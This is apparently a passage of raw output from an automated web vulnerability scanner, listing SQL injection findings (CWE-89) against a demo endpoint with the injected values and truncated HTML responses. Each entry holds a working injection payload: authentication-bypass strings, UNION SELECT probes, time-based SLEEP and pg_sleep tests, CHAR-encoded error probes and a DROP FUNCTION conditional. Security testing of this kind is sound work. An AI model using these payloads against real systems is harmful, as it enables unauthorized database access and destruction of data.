href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1406\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" or \"1\"=\"1\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1407\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1408Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1409\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1410\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" or \"1\"=\"1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1411\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language\n=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\n\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-\naed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-\n- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSB\nJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgA\nQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1412\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1413\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1414\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION \nxcjl--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1415\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1416\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1417\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \") or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1418\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1419\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 